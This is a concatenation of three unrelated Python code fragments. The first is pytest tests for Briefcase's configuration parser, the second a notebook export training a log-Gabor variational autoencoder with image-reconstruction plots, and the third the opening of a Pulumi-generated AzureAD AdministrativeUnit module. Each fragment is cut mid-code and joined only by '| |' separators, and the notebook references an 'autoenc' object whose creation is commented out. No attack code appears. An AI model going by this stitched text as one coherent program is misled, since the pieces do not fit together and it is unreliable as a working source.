"appvalue": "the app",
"platformvalue": "macos platform",
},
'other_app': {
"app_name": "other_app",
"value": 4,
"basevalue": "the base",
"platformvalue": "other macos platform",
}
}
def test_platform_override_ordering():
"The order of platform processing doesn't affect output"
config_file = StringIO(
"""
[tool.briefcase]
value = 0
basevalue = "the base"
[tool.briefcase.app.my_app]
value = 1
appvalue = "the app"
[tool.briefcase.app.my_app.macOS]
value = 2
platformvalue = "macos platform"
[tool.briefcase.app.my_app.windows]
value = 3
platformvalue = "windows platform"
[tool.briefcase.app.other_app.macOS]
value = 4
platformvalue = "other macos platform"
"""
)
global_options, apps = parse_config(config_file, platform='macOS', output_format='app')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'basevalue': "the base"
}
# Since a macOS app has been requested, the macOS platform values
# take priority. Linux configuration values are dropped.
# The second app doesn't provide an explicit app-level config, but
# the app exists because the platform exists.
# Platforms should be processed in order, which means that windows
# will be processed after macos.
assert apps == {
'my_app': {
"app_name": "my_app",
"value": 2,
"basevalue": "the base",
"appvalue": "the app",
"platformvalue": "macos platform",
},
'other_app': {
"app_name": "other_app",
"value": 4,
"basevalue": "the base",
"platformvalue": "other macos platform",
}
}
def test_format_override():
"An app can define format settings that override base and platform settings"
config_file = StringIO(
"""
[tool.briefcase]
value = 0
basevalue = "the base"
[tool.briefcase.app.my_app]
value = 1
appvalue = "the app"
[tool.briefcase.app.my_app.macOS]
value = 2
platformvalue = "macos platform"
[tool.briefcase.app.my_app.macOS.app]
value = 21
formatvalue = "app format"
[tool.briefcase.app.my_app.macOS.dmg]
value = 22
formatvalue = "dmg format"
[tool.briefcase.app.my_app.macOS.homebrew]
value = 23
formatvalue = "homebrew format"
[tool.briefcase.app.my_app.linux]
value = 3
platformvalue = "linux platform"
[tool.briefcase.app.my_app.linux.snap]
value = 31
formatvalue = "snap format"
[tool.briefcase.app.my_app.linux.appimage]
value = 32
formatvalue = "appimage format"
[tool.briefcase.app.other_app.macOS.app]
value = 41
formatvalue = "other macos app format"
"""
)
global_options, apps = parse_config(config_file, platform='macOS', output_format='app')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'basevalue': "the base"
}
# Since a macOS app has been requested, the macOS app format values
# take priority. Linux configuration values are dropped.
# The second app doesn't provide an explicit app-level config, but
# the app exists because the platform exists.
# Formats should be processed in order, which means that app
# will be processed before dmg and homebrew.
assert apps == {
'my_app': {
"app_name": "my_app",
"value": 21,
"basevalue": "the base",
"appvalue": "the app",
"platformvalue": "macos platform",
"formatvalue": "app format",
},
'other_app': {
"app_name": "other_app",
"value": 41,
"basevalue": "the base",
"formatvalue": "other macos app format",
}
}
def test_format_override_ordering():
"The order of format processing doesn't affect output"
config_file = StringIO(
"""
[tool.briefcase]
value = 0
basevalue = "the base"
[tool.briefcase.app.my_app]
value = 1
appvalue = "the app"
[tool.briefcase.app.my_app.macOS]
value = 2
platformvalue = "macos platform"
[tool.briefcase.app.my_app.macOS.app]
value = 21
formatvalue = "app format"
[tool.briefcase.app.my_app.macOS.dmg]
value = 22
formatvalue = "dmg format"
[tool.briefcase.app.my_app.macOS.homebrew]
value = 23
formatvalue = "homebrew format"
[tool.briefcase.app.my_app.linux]
value = 3
platformvalue = "linux platform"
[tool.briefcase.app.my_app.linux.snap]
value = 31
formatvalue = "snap format"
[tool.briefcase.app.my_app.linux.appimage]
value = 32
formatvalue = "appimage format"
[tool.briefcase.app.other_app.macOS.app]
value = 41
formatvalue = "other macos app format"
"""
)
global_options, apps = parse_config(config_file, platform='macOS', output_format='dmg')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'basevalue': "the base"
}
# Since a macOS dmg has been requested, the macOS dmg format values
# take priority. Linux configuration values are dropped.
# The second app doesn't provide an explicit app-level config, but
# the app exists because the platform exists.
# Formats should be processed in order, which means that dmg
# will be processed after app, but before homebrew.
assert apps == {
'my_app': {
"app_name": "my_app",
"value": 22,
"basevalue": "the base",
"appvalue": "the app",
"platformvalue": "macos platform",
"formatvalue": "dmg format",
},
'other_app': {
"app_name": "other_app",
"value": 0,
"basevalue": "the base",
}
}
def test_requires():
"Requirements can be specified"
config_file = StringIO(
"""
[tool.briefcase]
value = 0
requires = ["base value"]
[tool.briefcase.app.my_app]
requires = ["my_app value"]
[tool.briefcase.app.my_app.macOS]
requires = ["macos value"]
[tool.briefcase.app.my_app.macOS.app]
requires = ["app value"]
[tool.briefcase.app.my_app.macOS.dmg]
requires = ["dmg value"]
[tool.briefcase.app.my_app.linux]
requires = ["linux value"]
[tool.briefcase.app.my_app.linux.appimage]
requires = ["appimage value"]
[tool.briefcase.app.other_app]
"""
)
# Request a macOS app
global_options, apps = parse_config(config_file, platform='macOS', output_format='app')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'requires': ["base value"],
}
# The macOS my_app app specifies a full inherited chain.
# The other_app app doesn't specify any options.
assert apps == {
'my_app': {
"app_name": "my_app",
"requires": [
"base value",
"my_app value",
"macos value",
"app value",
],
"value": 0,
},
'other_app': {
"app_name": "other_app",
"requires": [
"base value",
],
"value": 0,
}
}
# Request a macOS dmg
config_file.seek(0)
global_options, apps = parse_config(config_file, platform='macOS', output_format='dmg')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'requires': ["base value"]
}
# The macOS my_app dmg specifies a full inherited chain.
# The other_app dmg doesn't specify any options.
assert apps == {
'my_app': {
"app_name": "my_app",
"requires": [
"base value",
"my_app value",
"macos value",
"dmg value",
],
"value": 0,
},
'other_app': {
"app_name": "other_app",
"requires": [
"base value",
],
"value": 0,
}
}
config_file.seek(0)
global_options, apps = parse_config(config_file, platform='linux', output_format='appimage')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'requires': ["base value"]
}
# The linux my_app appimage overrides the *base* | |
nn.ReLU()(x) # sparse code
#x = self.unconv4(x) # dense code
#print(x.shape)
#x = self.unconv3b(x)
#x = nn.ReLU()(x) # sparse code
#x = self.unconv3(x) # dense code
#print(x.shape)
#x = self.unconv2b(x)
#x = nn.ReLU()(x) # sparse code
x = self.unconv2(x) # dense code
#print(x.shape)
#x = self.unconv1b(x)
x = nn.ReLU()(x) # sparse code
x = self.unconv1(x)
#print(x.shape)
x = x.view(-1, self.n_color, self.n_theta, self.n_phase, self.n_levels, self.n_eccentricity, self.n_azimuth)
x = x.permute(0, 4, 1, 5, 6, 2, 3).contiguous()
return x
# #### Tests
# In[491]:
dec = Decoder(n_levels - 1, n_color, n_eccentricity, n_azimuth, n_theta, n_phase)
dec_out = dec(code) #, indices1, indices2)
dec_out.shape
# In[492]:
del dec
# In[493]:
class InverseLogGaborMapper(nn.Module):
def __init__(self, in_chan = n_eccentricity * n_azimuth * n_theta * n_phase,
out_chan = width * width):
super(InverseLogGaborMapper, self).__init__()
self.inverseMap = nn.Linear(in_chan, out_chan)
def forward(self, x, **kargs):
out = self.inverseMap(x) #!!
return out #!!
# ### Model and learning params
# In[1502]:
batch_size = 50
autoenc_lr = 1e-4
invLG_lr = 1e-4
n_epoch = 10000
recording_steps = 10
# In[1503]:
'''if False:
fic_name = '2021-03-10-log-polar-deep-convolutional-no-max-pool-laplace-lab'+'_autoenc.pt'
autoenc = torch.load(fic_name)
for param in autoenc.encoder_l.parameters():
param.requires_grad = False
for param in autoenc.decoder_l.parameters():
param.requires_grad = False
else:'''
'''autoenc = AutoEncoder(n_levels, n_color, n_eccentricity, n_azimuth, n_theta,
n_phase, out_chan=out_chan,
is_VAE=False, residual_encode = True)'''
invLGmap = InverseLogGaborMapper()
autoenc_VAE = AutoEncoder(n_levels, n_color, n_eccentricity, n_azimuth, n_theta,
n_phase, out_chan=out_chan,
is_VAE=True,
residual_encode=True)
# In[1504]:
autoenc_VAE_optimizer = optim.Adam(autoenc_VAE.parameters(), lr = autoenc_lr)
invLG_optimizer = optim.Adam(invLGmap.parameters(), lr = invLG_lr)
criterion = nn.MSELoss() #loss = criterion(outputs, inputs)
# In[1505]:
dataloader = DataLoader(saccade_dataset, batch_size=batch_size,
shuffle=True, num_workers=0)
# In[1506]:
KL_loss_list = []
MSE_loss_list = []
invLG_loss_list = []
# In[1507]:
script_name
# In[1508]:
PATH = script_name + '_invLGmap.pt'
if not os.path.exists(PATH):
for epoch in range(n_epoch): # loop over the dataset multiple times
KL_running_loss = 0.0
MSE_running_loss = 0.0
invLG_running_loss = 0.0
for step, data in enumerate(dataloader):
batch_size_eff = data['img_crop'].shape[0]
log_gabor_coefs = log_gabor_transform(data['img_crop'], K)
# Normalizing
autoenc_inputs = log_gabor_coefs.clone()
if color_mode == 'rgb':
autoenc_inputs /= 256 # !! Normalization
autoenc_outputs, mu, logvar, z = autoenc_VAE(autoenc_inputs)
autoenc_VAE_optimizer.zero_grad()
MSE_loss = 0.5 * nn.MSELoss(reduction='sum')(autoenc_outputs, autoenc_inputs)
KL_loss = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
autoenc_VAE_loss = MSE_loss + KL_loss
autoenc_VAE_loss.backward()
autoenc_VAE_optimizer.step()
invLG_optimizer.zero_grad()
log_gabor_coefs_rec = autoenc_outputs.detach().view(batch_size_eff*n_levels*n_color,
n_eccentricity*n_azimuth*n_theta*n_phase)
img_pyr_rec_rec = invLGmap(log_gabor_coefs_rec)
img_pyr_targets = data['img_crop'][:,:n_levels,...].contiguous()
img_pyr_targets = img_pyr_targets.view(batch_size_eff * n_levels * n_color,
width * width)
if color_mode == 'rgb':
img_pyr_targets /= 256 # !! Normalization
invLG_loss = nn.MSELoss(reduction='sum')(img_pyr_rec_rec, img_pyr_targets)
invLG_loss.backward()
invLG_optimizer.step()
# print statistics
KL_running_loss += KL_loss.item()
MSE_running_loss += MSE_loss.item()
invLG_running_loss += invLG_loss.item()
if (step+1)%recording_steps == 0 : # print every n_steps mini-batches
print('[%d, %5d] losses: %.3f, %.3f, %.3f' %
(epoch + 1,
step + 1,
KL_running_loss/recording_steps,
MSE_running_loss/recording_steps,
invLG_running_loss/recording_steps))
#.append
KL_loss_list.append(KL_running_loss/recording_steps)
MSE_loss_list.append(MSE_running_loss/recording_steps)
invLG_loss_list.append(invLG_running_loss/recording_steps)
KL_running_loss = 0.0
MSE_running_loss = 0.0
invLG_running_loss = 0.0
if epoch % 10 == 0 :
PATH = script_name + '_KL_loss_list.npy'
np.save(PATH, np.array(KL_loss_list))
PATH = script_name + '_MSE_loss_list.npy'
np.save(PATH, np.array(MSE_loss_list))
PATH = script_name + '_invLG_loss_list.npy'
np.save(PATH, np.array(invLG_loss_list))
PATH = script_name + '_invLGmap.pt'
torch.save(invLGmap, PATH)
#PATH = script_name + '_autoenc.pt'
#torch.save(autoenc, PATH)
PATH = script_name + '_autoenc_VAE.pt'
torch.save(autoenc_VAE, PATH)
print('Model saved')
print('Finished Training ')
else:
PATH = script_name + '_KL_loss_list.npy'
KL_loss_list = np.load(PATH).tolist()
PATH = script_name + '_MSE_loss_list.npy'
MSE_loss_list = np.load(PATH).tolist()
PATH = script_name + '_invLG_loss_list.npy'
invLG_loss_list = np.load(PATH).tolist()
PATH = script_name + '_invLGmap.pt'
invLGmap = torch.load(PATH)
#PATH = script_name + '_autoenc.pt'
#autoenc = torch.load(PATH)
PATH = script_name + '_autoenc_VAE.pt'
autoenc_VAE = torch.load(PATH)
print('Model loaded')
# In[1509]:
plt.plot(autoenc_inputs[0,...].detach().numpy().flatten())
# In[1510]:
log_gabor_coefs = log_gabor_transform(data['img_crop'], K)
autoenc_inputs = log_gabor_coefs.clone()
autoenc_outputs, mu, logvar, z = autoenc_VAE(autoenc_inputs)
#plt.plot(torch.randn_like(logvar)[0,...].detach().numpy().flatten())
# In[1511]:
out_chan
# In[1512]:
if False :
PATH = script_name + '_KL_loss_list.npy'
np.save(PATH, np.array(KL_loss_list))
PATH = script_name + '_MSE_loss_list.npy'
np.save(PATH, np.array(MSE_loss_list))
PATH = script_name + '_invLG_loss_list.npy'
np.save(PATH, np.array(invLG_loss_list))
PATH = script_name + '_invLGmap.pt'
torch.save(invLGmap, PATH)
#PATH = script_name + '_autoenc.pt'
#torch.save(autoenc, PATH)
PATH = script_name + '_autoenc_VAE.pt'
torch.save(autoenc_VAE, PATH)
print('Model saved')
# In[1513]:
import seaborn
seaborn.set()
plt.figure(figsize=(12,12))
plt.plot(np.array(MSE_loss_list), label = 'MSE')
plt.plot(np.array(KL_loss_list)*100, label = 'KL')
plt.plot(np.array(invLG_loss_list)*10, label = 'invLGMap')
#plt.ylim(0,500)
plt.title('LOSS')
plt.xlabel('# batch')
plt.legend()
#plt.ylim(0,1000000000000)
# In[1514]:
plt.hist(mu.detach().numpy().flatten(),20)
plt.figure()
plt.hist(logvar.detach().numpy().flatten(),20)
# ## Encoding and decoding
# In[1515]:
seaborn.reset_orig()
# In[1516]:
for i in range(batch_size):
print(data['name'][i])
# In[1517]:
img_name = 'i1198772915'
if True:
locpath = '../ALLSTIMULI/' + img_names[10] + '.jpeg'
locpath = '../ALLSTIMULI/' + data['name'][11] + '.jpeg'
#locpath = '../ALLSTIMULI/' + img_name + '.jpeg'
img_orig = Image.open(locpath)
else:
locpath= '../data/professional_test/test/namphuong-van-260.png'
locpath= '../data/professional_test/test/shannon-kelley-108053.png'
img_orig = Image.open(locpath)
#img_orig = img_orig.resize((1024,768))
plt.figure(figsize=(20,15))
if color_mode=='hsv':
img_orig = rgb2hsv(img_orig)
plt.imshow(hsv2rgb(img_orig))
elif color_mode=='lab':
img_orig = rgb2lab(img_orig)
plt.imshow(lab2rgb(img_orig))
else:
plt.imshow(img_orig)
# In[1518]:
img_tens = torch.Tensor(np.array(img_orig)[None,...]).permute(0,3,1,2)
# In[1519]:
img_crop = cropped_pyramid(img_tens,
width=width,
color=color,
do_mask=do_mask,
verbose=True,
n_levels=n_levels)[0]
# In[1520]:
log_gabor_coeffs = log_gabor_transform(img_crop, K)
log_gabor_coeffs.shape
# In[1521]:
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
if False:
img_rec[:,-1,...]= img_crop[:,-1,...]
full_img_rec = inverse_pyramid(img_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec = full_img_rec.detach().permute(0,2,3,1).numpy() #.clip(0,255).astype('uint8')
plt.figure(figsize=(20,15))
image_show(full_img_rec[0,:], color_mode=color_mode)
N_X, N_Y = full_img_rec.shape[1:3]
# In[1522]:
full_img_rec.shape
# In[1523]:
autoenc_VAE.eval()
autoenc_inputs = log_gabor_coeffs.clone()
if color_mode == 'rgb':
autoenc_inputs /= 256
log_gabor_coeffs_rec, mu, logvar, z = autoenc_VAE( autoenc_inputs )
log_gabor_coeffs_rec = log_gabor_coeffs_rec.view(1, n_levels, -1)
if color_mode == 'rgb':
log_gabor_coeffs_rec *= 256
# In[1524]:
z
# In[1525]:
plt.figure(figsize=(20,7))
plt.plot(log_gabor_coeffs.numpy().flatten()[:], label = 'original')
plt.plot(log_gabor_coeffs_rec.detach().numpy().flatten()[:], label = 'reconstructed')
plt.title('LOG GABOR COEFFS')
plt.legend()
for level in range(n_levels):
plt.figure(figsize=(20,4))
plt.plot(log_gabor_coeffs[0,level,...].numpy().flatten(), label = 'original')
plt.plot(log_gabor_coeffs_rec[0,level,...].detach().numpy().flatten(), label = 'reconstructed')
c = np.corrcoef([log_gabor_coeffs[0,level,...].numpy().flatten(), log_gabor_coeffs_rec[0,level,...].detach().numpy().flatten()])[0,1]
plt.title('LOG GABOR COEFFS LEVEL '+str(level)+', corr='+str(c))
plt.legend()
# In[1526]:
_=plt.hist(log_gabor_coeffs.numpy().flatten(),100)
# In[1527]:
_=plt.hist(img_crop.numpy().flatten(),100)
# ## Reconstruction tests
# In[1528]:
K_inv = get_K_inv(K, width=width, n_sublevel = n_sublevel, n_azimuth = n_azimuth, n_theta = n_theta, n_phase = n_phase)
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
img_rec[:,-1,...] = img_crop[:,-1,...]
axs = tensor_pyramid_display(img_rec.clone())
# In[1529]:
inv_LGmap_input = log_gabor_coeffs_rec.view(n_levels * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)
inv_LGmap_input.shape
# In[1530]:
img_rec_rec = invLGmap(inv_LGmap_input) #inv_LGmap_input)
img_rec_rec = img_rec_rec.view(1, n_levels, n_color, width, width).detach()
#img_rec_rec = torch.cat((img_rec_rec, img_crop[0:,-1:,...]), 1)
#img_rec_rec[0,-1,...] *=0 #+= 128
axs = tensor_pyramid_display(img_rec_rec)
# ### Test de invLGmap uniquement sur log gabor coeffs originaux
# In[1531]:
img_rec_test = invLGmap(log_gabor_coeffs.view(n_levels * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)) #inv_LGmap_input)
img_rec_test = img_rec_test.view(1, n_levels, n_color, width, width).detach()
img_rec_test[:,-1,...] = img_crop[:,-1,...]
axs = tensor_pyramid_display(img_rec_test)
# ### Test des coeffs reconstruits avec differentes valeurs de K_inv
img_rec_rec_test = []
for i, rcond in enumerate((0.1, 0.03, 0.01, 0.003, 0.001, 0)):
K_ = K.reshape((width**2, n_sublevel*n_azimuth*n_theta*n_phase))
print('Reshaped filter tensor=', K_.shape)
if rcond>0:
K_inv_test = torch.pinverse(K_, rcond=rcond)
else:
K_inv_test = torch.pinverse(K_)
print('Tensor shape=', K_inv.shape)
K_inv_test =K_inv_test.reshape(n_sublevel, n_azimuth, n_theta, n_phase, width, width)
img_rcond_test = inverse_gabor(log_gabor_coeffs.detach(), K_inv_test)
#img_rcond_test[:,-1,...] = img_crop[:,-1,...]
axs = tensor_pyramid_display(img_rcond_test)
axs[0].set_title('REGULARIZATION = '+str(rcond)+', ORIGINAL LOG-GABOR COEFS')
img_rec_rcond_test = inverse_gabor(log_gabor_coeffs_rec.detach(), K_inv_test)
#img_rec_rcond_test[:,-1,...] = img_crop[:,-1,...]
img_rec_rec_test.append(img_rec_rcond_test)
axs = tensor_pyramid_display(img_rec_rcond_test)
axs[0].set_title('AUTO-ENCODER LOG-GABOR RECONSTRUCTION')
# ### Full image reconstruction
# In[1532]:
#img_crop = cropped_pyramid(img_tens, color=color, do_mask=do_mask, verbose=True, n_levels=n_levels)[0]
N_X, N_Y = full_img_rec.shape[1:3]
full_img_crop = inverse_pyramid(img_crop, color=color, gauss=gauss, n_levels=n_levels)
full_img_crop = full_img_crop.detach().permute(0,2,3,1).numpy()
plt.figure(figsize=(20,15))
image_show(full_img_crop[0,:], color_mode)
plt.title('RECONSTRUCTED FROM CROPPED PYRAMID, #params = ' + str(np.prod(img_crop[0,...].size())), fontsize=20)
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
#img_rec[:,-1,...]= img_crop[:,-1,...]
full_img_rec = inverse_pyramid(img_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec = full_img_rec.detach().permute(0,2,3,1).numpy()
plt.figure(figsize=(20,15))
image_show(full_img_rec[0,:], color_mode)
plt.title('RECONSTRUCTED FROM LOG GABOR COEFFS, #params = ' + str(np.prod(log_gabor_coeffs[0,...].size())), fontsize=20)
full_img_rec_rec = inverse_pyramid(img_rec_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec = full_img_rec_rec.detach().permute(0,2,3,1).numpy()
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
image_show(full_img_rec_rec[0,:], color_mode)
plt.title('RECONSTRUCTED FROM AUTO-ENCODER, #params = ' + str(out_chan), fontsize=20)
'''
img_rec_rec_test[3][:,-1,...]= img_crop[:,-1,...]
full_img_rec_rec_test = inverse_pyramid(img_rec_rec_test[3], color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_test = full_img_rec_rec_test.detach().permute(0,2,3,1).numpy().clip(0,255).astype('uint8')
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
plt.imshow(full_img_rec_rec_test[0,:])
plt.title('RECONSTRUCTED FROM AUTOENCODER OUTPUTS AND REGULARIZED INVERSE MAP')
'''
if False:
plt.savefig(script_name+'_soleil_levant.png', bbox_inches='tight')
# In[1533]:
#img_crop = cropped_pyramid(img_tens, color=color, do_mask=do_mask, verbose=True, n_levels=n_levels)[0]
plt.figure(figsize=(20,60))
plt.subplot(4,1,1)
img = img_tens.detach().permute(0,2,3,1).numpy()
N_X, N_Y = img.shape[1:3]
image_show(img[0,N_X//2-128:N_X//2+128,
N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('ORIGINAL IMAGE, #params = ' + str(np.prod(img_tens[0,...].size())), fontsize=20)
plt.subplot(4,1,2)
full_img_crop = inverse_pyramid(img_crop, color=color, gauss=gauss, n_levels=n_levels)
full_img_crop = full_img_crop.detach().permute(0,2,3,1).numpy()
N_X, N_Y = full_img_crop.shape[1:3]
image_show(full_img_crop[0,N_X//2-128:N_X//2+128,
N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('RECONSTRUCTED FROM CROPPED PYRAMID, #params = ' + str(np.prod(img_crop[0,...].size())), fontsize=20)
plt.subplot(4,1,3)
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
#img_rec[:,-1,...]= img_crop[:,-1,...]
full_img_rec = inverse_pyramid(img_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec = full_img_rec.detach().permute(0,2,3,1).numpy()
image_show(full_img_rec[0,N_X//2-128:N_X//2+128,
N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('RECONSTRUCTED FROM LOG GABOR COEFFS, #params = ' + str(np.prod(log_gabor_coeffs[0,...].size())), fontsize=20)
plt.subplot(4,1,4)
full_img_rec_rec = inverse_pyramid(img_rec_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec = full_img_rec_rec.detach().permute(0,2,3,1).numpy()
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
image_show(full_img_rec_rec[0,N_X//2-128:N_X//2+128,
N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('RECONSTRUCTED FROM AUTO-ENCODER, #params = ' + str(np.prod(code[0,...].shape)), fontsize=20)
'''
img_rec_rec_test[3][:,-1,...]= img_crop[:,-1,...]
full_img_rec_rec_test = inverse_pyramid(img_rec_rec_test[3], color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_test = full_img_rec_rec_test.detach().permute(0,2,3,1).numpy().clip(0,255).astype('uint8')
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
plt.imshow(full_img_rec_rec_test[0,:])
plt.title('RECONSTRUCTED FROM AUTOENCODER OUTPUTS AND REGULARIZED INVERSE MAP')
'''
if False:
plt.savefig(script_name+'.png', bbox_inches='tight')
# In[1534]:
img.shape
log_gabor_coeffs_roll = log_gabor_coeffs_rec.clone()
log_gabor_coeffs_roll = log_gabor_coeffs_roll.view(1,n_levels, n_color, n_eccentricity, n_azimuth, n_theta, n_phase)
#log_gabor_coeffs_roll[:,:n_levels-1,...]= log_gabor_coeffs_roll[:,:n_levels-1,...].roll(-4,4) #.roll(4, 4)
log_gabor_coeffs_roll= log_gabor_coeffs_roll.roll(1,4) #.roll(4, 4)
log_gabor_coeffs_roll= log_gabor_coeffs_roll.roll(1,1) #.roll(4, 4)
#log_gabor_coeffs_roll= log_gabor_coeffs_roll.roll(-1,5) #.roll(4, 4)
inv_LGmap_input = log_gabor_coeffs_roll.view((n_levels) * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)
img_rec_rec_roll = invLGmap(inv_LGmap_input) #inv_LGmap_input)
img_rec_rec_roll = img_rec_rec_roll.view(1, n_levels, n_color, width, width).detach()
#img_rec_rec_roll = torch.cat((img_rec_rec_roll, img_crop[0:,-1:,...]), 1)
full_img_rec_rec_roll = inverse_pyramid(img_rec_rec_roll, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_roll = full_img_rec_rec_roll.detach().permute(0,2,3,1).numpy()
if color_mode == 'rgb':
full_img_rec_rec_roll = full_img_rec_rec_roll.clip(0,255).astype('uint8')
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
image_show(full_img_rec_rec_roll[0,:], color_mode)
plt.title('ROTATION/ZOOM FROM COMPRESSED SENSING LAYER')
#log_gabor_coeffs_roll[:,:n_levels-1,...] = log_gabor_coeffs_roll[:,:n_levels-1,...].roll(1,1) #.roll(4, 4)
# In[1535]:
z_test = torch.randn_like(mu)
logvar.shape
autoenc.out_chan
autoenc_inputs.shape
log_gabor_coeffs_rec, mu, logvar, z = autoenc_VAE( autoenc_inputs)
z_in = torch.randn_like(mu) * 30
log_gabor_coeffs_rec_test, mu, logvar, z = autoenc_VAE( autoenc_inputs, z_in=z_in )
inv_LGmap_input = log_gabor_coeffs_rec_test.view(n_levels * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)
img_rec_rec_test = invLGmap(inv_LGmap_input) #inv_LGmap_input)
img_rec_rec_test = img_rec_rec_test.view(1, n_levels, n_color, width, width).detach()
#img_rec_rec_test = torch.cat((img_rec_rec_test, img_crop[0:,-1:,...]), 1)
full_img_rec_rec_test = inverse_pyramid(img_rec_rec_test, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_test = full_img_rec_rec_test.detach().permute(0,2,3,1).numpy()
plt.figure(figsize=(20,15))
image_show(full_img_rec_rec_test[0,:], color_mode)
# In[1536]:
log_gabor_coeffs = log_gabor_transform(img_crop, K)
autenc_inputs_VAE_test = log_gabor_coeffs.clone()
autenc_inputs_VAE_test[0,:6,...] = 0
plt.figure()
plt.plot(autenc_inputs_VAE_test.detach().numpy().flatten())
# In[1537]:
#log_gabor_coeffs_rec, mu, logvar, z = autoenc_VAE(autenc_inputs_test)
z_in = None #torch.randn_like(mu) * 30
log_gabor_coeffs_rec_test, mu, logvar, z | |
<filename>sdk/python/pulumi_azuread/administrative_unit.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AdministrativeUnitArgs', 'AdministrativeUnit']
@pulumi.input_type
class AdministrativeUnitArgs:
def __init__(__self__, *,
display_name: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a AdministrativeUnit resource.
:param pulumi.Input[str] display_name: The display name of the administrative unit.
:param pulumi.Input[str] description: The description of the administrative unit.
:param pulumi.Input[bool] hidden_membership_enabled: Whether the administrative unit and its members are hidden or publicly viewable in the directory
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing administrative unit is found with the same name
"""
pulumi.set(__self__, "display_name", display_name)
if description is not None:
pulumi.set(__self__, "description", description)
if hidden_membership_enabled is not None:
pulumi.set(__self__, "hidden_membership_enabled", hidden_membership_enabled)
if members is not None:
pulumi.set(__self__, "members", members)
if prevent_duplicate_names is not None:
pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The display name of the administrative unit.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the administrative unit.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="hiddenMembershipEnabled")
def hidden_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the administrative unit and its members are hidden or publicly viewable in the directory
"""
return pulumi.get(self, "hidden_membership_enabled")
@hidden_membership_enabled.setter
def hidden_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "hidden_membership_enabled", value)
@property
@pulumi.getter
def members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
"""
return pulumi.get(self, "members")
@members.setter
def members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "members", value)
@property
@pulumi.getter(name="preventDuplicateNames")
def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, will return an error if an existing administrative unit is found with the same name
"""
return pulumi.get(self, "prevent_duplicate_names")
@prevent_duplicate_names.setter
def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_duplicate_names", value)
@pulumi.input_type
class _AdministrativeUnitState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
object_id: Optional[pulumi.Input[str]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering AdministrativeUnit resources.
:param pulumi.Input[str] description: The description of the administrative unit.
:param pulumi.Input[str] display_name: The display name of the administrative unit.
:param pulumi.Input[bool] hidden_membership_enabled: Whether the administrative unit and its members are hidden or publicly viewable in the directory
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
:param pulumi.Input[str] object_id: The object ID of the administrative unit.
